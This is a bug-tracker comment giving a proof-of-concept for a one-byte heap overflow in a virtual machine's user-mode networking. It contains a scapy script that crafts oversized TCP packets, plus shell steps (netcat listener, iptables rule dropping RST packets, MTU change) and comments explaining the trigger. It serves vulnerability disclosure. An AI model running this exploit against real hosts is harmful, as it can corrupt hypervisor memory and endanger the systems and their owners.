Comment 3 for bug 1858415

poc:
```python
#!/usr/bin/python3

import os
import time
from scapy.all import *

target_ip = '10.0.2.2'
target_port = 7070

def start_tcp(target_ip,target_port,str_to_send):
    global sport,s_seq,d_seq
    try:
        ans = sr1(IP(dst=target_ip)/TCP(dport=target_port,sport=RandShort(),seq=RandInt(),flags=0x2),verbose=False)
        sport = ans[TCP].dport
        s_seq = ans[TCP].ack
        d_seq = ans[TCP].seq+1

        send(IP(dst=target_ip)/TCP(dport=target_port,sport=sport,ack=d_seq,seq=s_seq,flags=0x10),verbose=False)

        send(IP(dst=target_ip)/TCP(dport=target_port,sport=sport,ack=d_seq,seq=s_seq,flags=0x18)/str_to_send,verbose=False)
        print(ans[TCP])
    except Exception as e:
        print(e)

if __name__ == '__main__':
    buf = ['R' for n in range(2200)];
    buf_len = len(buf);

    buf[buf_len-10]= chr(0x50)
    buf[buf_len-9] = chr(0x4e)
    buf[buf_len-8] = chr(0x41)
    buf[buf_len-7] = chr(0x00)
    buf[buf_len-1] = chr(27)
    start_tcp(target_ip,target_port,"".join(buf))
```

In host OS run:

```shell
nc -l -p 7070
```

In guest OS run:

```shell
# iptables -A OUTPUT -p tcp --tcp-flags RST RST -d 10.0.2.2 -j DROP # Because we will use Python to construct tcp packets, this will prevent the kernel from sending rst packets.
# ip link set ens3 mtu 3000 # When the sending size is larger than the default mtu packet, the slipr_input function allocates space from the heap, and then we can overflow one byte of the heap space
# ./poc
```

This will cause a byte heap overflow.